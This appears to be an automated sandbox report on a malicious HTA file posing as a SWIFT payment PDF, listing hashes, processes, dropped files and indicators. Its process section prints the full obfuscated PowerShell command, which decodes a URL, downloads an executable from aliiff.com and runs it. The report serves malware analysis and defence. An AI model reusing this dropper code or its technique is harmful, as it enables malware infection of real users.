analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Swift Copyusd180000_pdf.hta

Full analysis: https://app.any.run/tasks/9cef94c6-0285-48f8-bb0c-c23c486fde0b
Verdict: Malicious activity
Analysis date: July 11, 2019, 12:46:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
MD5:

4649EE06E336170FD843122B15C3C0F5

SHA1:

E3FA0077A75AA0BAFCEEADA1A7857E99FC2B3BE3

SHA256:

93BA9C1B36188A646B638834E3B323A94B3F8CB037C4399183D77865D4904C70

SSDEEP:

384:xlJTuIXBrLlJTuIXBrVzlJTuIXBrJ9QlJTuIXBrgNsSIdvlJTuIXBrklJTuIXBrr:bJTvXBrJJTvXBrVhJTvXBrJ9EJTvXBro

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • mshta.exe (PID: 3040)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2516)
  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3040)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.html | HyperText Markup Language (100)

EXIF

HTML

ContentType: text/html; charset=utf-8
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start mshta.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3040"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\Swift Copyusd180000_pdf.hta"C:\Windows\System32\mshta.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2516"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$mogkues = Get-Random -Min 3 -Max 4;$mstfnpdxlqb = ([char[]]([char]97..[char]122));$xdvjgkn = -join ($mstfnpdxlqb | Get-Random -Count $mogkues | % {[Char]$_});$kydajzpsbc = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$oupiezbyv = $xdvjgkn + $kydajzpsbc;$yblvqjnguze=[char]0x53+[char]0x61+[char]0x4c;$qcuiev=[char]0x49+[char]0x45+[char]0x58;$czmajniwr=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jbgnfahpd $yblvqjnguze;$zswbftl=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jbgnfahpd aypskwmvhq $qcuiev;$bcofzydnte=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|aypskwmvhq;jbgnfahpd nrlqzad $czmajniwr;$wirnpmx = $bcofzydnte + [char]0x5c + $oupiezbyv;$uyhdokji = $xdvjgkn + '';$stzeijykhof = '';$stzeijykhof = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($stzeijykhof));$tewfaxgz = $env:PUBLIC + [char]0x5c + $uyhdokji;$zswbftl=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;$suhvylewt = New-Object $zswbftl;try{$kfdteubny = $suhvylewt.DownloadData($stzeijykhof)}catch{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$kfdteubny = $suhvylewt.DownloadData($stzeijykhof)};[IO.File]::WriteAllBytes($tewfaxgz, $kfdteubny);nrlqzad $tewfaxgz;;;;$nwmicpveoh = 'aHR0cDovL2FsaWlmZi5jb20vYXBwL3dlYnJvb3QvZGF0ZS9pbmsuZXhl';$nwmicpveoh=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($nwmicpveoh));$xbdakwmf = New-Object $zswbftl;$vgiobrhu = $xbdakwmf.DownloadData($nwmicpveoh);[IO.File]::WriteAllBytes($wirnpmx, $vgiobrhu);nrlqzad $wirnpmx;;$uhapsnvxky = @($hlrov, $fyokgwdp, $vtlxc, $tnurqdxfeg);foreach($hwvxok in $uhapsnvxky){$null = $_}""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
313
Read events
242
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YB194TTTOK9865FEGLT6.temp
MD5:
SHA256:
2516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB
SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95
2516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF166c2c.TMPbinary
MD5:53C936F15BA0E898CA1BDCEB3AE9C5FB
SHA256:D7C26FC9FF2065D126D4339D2C20D865B8B2A8399AB7F0A1A3B06F7AD1A36C95
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2516
powershell.exe
95.168.186.145:80
aliiff.com
NL
suspicious

DNS requests

Domain
IP
Reputation
aliiff.com
  • 95.168.186.145
suspicious

Threats

No threats detected
No debug info